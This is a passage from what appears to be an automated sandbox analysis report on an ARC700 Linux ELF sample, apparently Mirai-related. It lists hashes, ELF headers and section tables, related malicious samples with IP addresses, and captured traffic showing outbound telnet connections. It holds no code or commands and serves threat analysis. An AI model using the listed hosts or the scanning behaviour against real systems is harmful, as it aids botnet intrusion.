                                                                                                    • 179.36.81.34
                                                                                                    qagSvPgKYd.elfGet hashmaliciousBrowse
                                                                                                    • 179.45.56.183
                                                                                                    nsc6A7rADm.elfGet hashmaliciousBrowse
                                                                                                    • 200.70.253.243
                                                                                                    nusCkyuUaT.elfGet hashmaliciousBrowse
                                                                                                    • 179.39.153.12
                                                                                                    razQKKxIPj.elfGet hashmaliciousBrowse
                                                                                                    • 181.21.8.113
                                                                                                    EVvKZpy4l6.elfGet hashmaliciousBrowse
                                                                                                    • 179.44.77.130
                                                                                                    transmigrativeLampwick.isoGet hashmaliciousBrowse
                                                                                                    • 181.25.198.186
                                                                                                    l.x86_64.elfGet hashmaliciousBrowse
                                                                                                    • 186.60.188.212
                                                                                                    dark.x86Get hashmaliciousBrowse
                                                                                                    • 179.44.30.148
                                                                                                    svrHelperGet hashmaliciousBrowse
                                                                                                    • 181.20.165.118
                                                                                                    pd4VXlGQPs.elfGet hashmaliciousBrowse
                                                                                                    • 209.13.36.15
                                                                                                    gZAeuxYybA.elfGet hashmaliciousBrowse
                                                                                                    • 201.179.202.227
                                                                                                    NxPjBmIj1w.elfGet hashmaliciousBrowse
                                                                                                    • 200.5.241.185
                                                                                                    ascaris.sh4.elfGet hashmaliciousBrowse
                                                                                                    • 179.39.104.99
                                                                                                    ATAv9VVyoV.elfGet hashmaliciousBrowse
                                                                                                    • 181.21.8.108
                                                                                                    Y7bs6Iraea.elfGet hashmaliciousBrowse
                                                                                                    • 190.174.0.79
                                                                                                    SecuriteInfo.com.Linux.Mirai.4338.285.20673.elfGet hashmaliciousBrowse
                                                                                                    • 179.38.146.25
                                                                                                    7DFa9S1kbA.elfGet hashmaliciousBrowse
                                                                                                    • 186.132.45.254
                                                                                                    No context
                                                                                                    No context
                                                                                                    No created / dropped files found
                                                                                                    File type:ELF 32-bit LSB executable, Synopsys ARCompact ARC700 cores, version 1 (SYSV), statically linked, stripped
                                                                                                    Entropy (8bit):6.653518843178181
                                                                                                    TrID:
                                                                                                    • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                                                                    File name:yNGgbod6dt.elf
                                                                                                    File size:148972
                                                                                                    MD5:62f1db29777c386f59a4836a2578e635
                                                                                                    SHA1:0adc886845b8a3a549b6d41a16c7e1644ec15908
                                                                                                    SHA256:2b68e82dada6e7bfa17c1ef77c4f03920d5644e34686a6e8a6ea5b809de70c1a
                                                                                                    SHA512:0d90e81a94196dd02191e85f9fc2aaffbc46960b33f650ea03cb879bdf7ab9bc5d628d97543c0a990049910d0aa8ae0d4a747d6da74f75a05f3cd995f5a4c009
                                                                                                    SSDEEP:3072:+BamDuoiU+jxgl30itMkPdWh8jIOs2GvLP54gaKuq:+BmozEtiUXuKuq
                                                                                                    TLSH:8FE3BEABBB8F0250C45702F40BCF5BAE6E6321509DAFC5E3AE39723B443A5C76516760
                                                                                                    File Content Preview:.ELF..............].........4....C......4. ...(......................0...0....... .......?..._..._..D...4A....... .......................................?..._..._..................Q.td.......................................................................

                                                                                                    ELF header

                                                                                                    Class:
                                                                                                    Data:
                                                                                                    Version:
                                                                                                    Machine:
                                                                                                    Version Number:
                                                                                                    Type:
                                                                                                    OS/ABI:
                                                                                                    ABI Version:
                                                                                                    Entry Point Address:
                                                                                                    Flags:
                                                                                                    ELF Header Size:
                                                                                                    Program Header Offset:
                                                                                                    Program Header Size:
                                                                                                    Number of Program Headers:
                                                                                                    Section Header Offset:
                                                                                                    Section Header Size:
                                                                                                    Number of Section Headers:
                                                                                                    Header String Table Index:
                                                                                                    NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                                                    NULL0x00x00x00x00x0000
                                                                                                    .initPROGBITS0x101140x1140x220x00x6AX001
                                                                                                    .textPROGBITS0x101380x1380x1840c0x00x6AX004
                                                                                                    .finiPROGBITS0x285440x185440x160x00x6AX001
                                                                                                    .rodataPROGBITS0x2855c0x1855c0xaaa40x00x2A004
                                                                                                    .tbssNOBITS0x35fe00x23fe00x80x00x403WAT004
                                                                                                    .fini_arrayFINI_ARRAY0x35fe00x23fe00x40x40x3WA004
                                                                                                    .ctorsPROGBITS0x35fe40x23fe40x80x00x3WA004
                                                                                                    .dtorsPROGBITS0x35fec0x23fec0x80x00x3WA004
                                                                                                    .gotPROGBITS0x35ff40x23ff40x80x00x3WA004
                                                                                                    .dataPROGBITS0x360080x240080x31c0x00x3WA004
                                                                                                    .bssNOBITS0x363240x243240x3df00x00x3WA004
                                                                                                    .ARC.attributes<unknown>0x00x243240x320x00x0001
                                                                                                    .shstrtabSTRTAB0x00x243560x650x00x0001
                                                                                                    TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                                                    LOAD0x00x100000x100000x230000x230006.78600x5R E0x2000.init .text .fini .rodata
                                                                                                    LOAD0x23fe00x35fe00x35fe00x3440x41344.19460x6RW 0x2000.tbss .fini_array .ctors .dtors .got .data .bss
                                                                                                    NOTE0x00x00x00x00x00.00000x4R 0x4
                                                                                                    TLS0x23fe00x35fe00x35fe00x00x80.00000x4R 0x4.tbss
                                                                                                    GNU_STACK0x00x00x00x00x00.00000x6RW 0x4
                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Jan 8, 2023 16:30:54.792280912 CET42836443192.168.2.2391.189.91.43
                                                                                                    Jan 8, 2023 16:30:55.560357094 CET4251680192.168.2.23109.202.202.202
                                                                                                    Jan 8, 2023 16:30:55.625251055 CET2333410190.173.195.220192.168.2.23
                                                                                                    Jan 8, 2023 16:30:55.625334024 CET2333410190.173.195.220192.168.2.23
                                                                                                    Jan 8, 2023 16:30:55.625490904 CET3341023192.168.2.23190.173.195.220
                                                                                                    Jan 8, 2023 16:30:55.625490904 CET3341023192.168.2.23190.173.195.220
                                                                                                    Jan 8, 2023 16:31:03.409223080 CET2353566190.107.216.65192.168.2.23
                                                                                                    Jan 8, 2023 16:31:03.409543991 CET5356623192.168.2.23190.107.216.65
                                                                                                    Jan 8, 2023 16:31:11.175534964 CET43928443192.168.2.2391.189.91.42
                                                                                                    Jan 8, 2023 16:31:21.414933920 CET42836443192.168.2.2391.189.91.43
                                                                                                    Jan 8, 2023 16:31:25.510767937 CET4251680192.168.2.23109.202.202.202
                                                                                                    Jan 8, 2023 16:31:52.133234978 CET43928443192.168.2.2391.189.91.42

                                                                                                    System Behavior